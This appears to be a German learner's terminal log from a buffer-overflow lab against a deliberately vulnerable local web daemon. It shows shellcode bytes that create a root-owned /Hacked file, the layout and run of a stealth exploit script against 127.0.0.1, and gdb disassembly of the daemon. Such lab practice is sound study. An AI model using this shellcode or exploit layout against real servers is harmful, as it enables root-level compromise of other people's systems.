root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm mark.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C mark
00000000  eb 1d 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |..[1..K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 cc e8  |.f.......j.X....|
00000020  de ff ff ff 2f 48 61 63  6b 65 64 58              |..../HackedX|
0000002c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# mkd
mkdir        mkdiskimage  mkdosfs     
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
ls: Zugriff auf /Hacked nicht möglich: Datei oder Verzeichnis nicht gefunden
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh mark 127.0.0.1
target IP: 127.0.0.1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (341 b)] [shellcode (44 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 11 18:35 /Hacked

Das hat ja wunderbar geklappt.

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) disass main
Dump of assembler code for function main:
   0x08048d47 <+0>: push   %ebp
… (viel Material; den NOP habe ich leider nicht gefunden, das ist aber nicht schlimm) …
   0x08048f73 <+556>: jmp    0x8048f1a <main+467>
End of assembler dump.
(gdb) disass handle_connection
Dump of assembler code for function handle_connection:
   0x08048f75 <+0>: push   %ebp
   0x08048f76 <+1>: mov    %esp,%ebp
   0x08048f78 <+3>: push   %edi
   0x08048f79 <+4>: push   %ebx
   0x08048f7a <+5>: sub    $0x620,%esp
   0x08048f80 <+11>: lea    -0x208(%ebp),%eax
   0x08048f86 <+17>: mov    %eax,0x4(%esp)
   0x08048f8a <+21>: mov    0x8(%ebp),%eax
   0x08048f8d <+24>: mov    %eax,(%esp)
   0x08048f90 <+27>: call   0x8048c68 <recv_line>
   0x08048f95 <+32>: mov    %eax,-0x10(%ebp)
   0x08048f98 <+35>: mov    0xc(%ebp),%eax
   0x08048f9b <+38>: movzwl 0x2(%eax),%eax
   0x08048f9f <+42>: movzwl %ax,%eax
   0x08048fa2 <+45>: mov    %eax,(%esp)
   0x08048fa5 <+48>: call   0x8048900 <ntohs@plt>

   0x080493a4 <+1071>: movl   $0x2,0x4(%esp)
   0x080493ac <+1079>: mov    0x8(%ebp),%eax
   0x080493af <+1082>: mov    %eax,(%esp)
   0x080493b2 <+1085>: call   0x8048940 <shutdown@plt>
   0x080493b7 <+1090>: add    $0x620,%esp
   0x080493bd <+1096>: pop    %ebx
   0x080493be <+1097>: pop    %edi
   0x080493bf <+1098>: pop    %ebp
   0x080493c0 <+1099>: ret   
End of assembler dump.
(gdb) ^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   

Websicherheit...  

   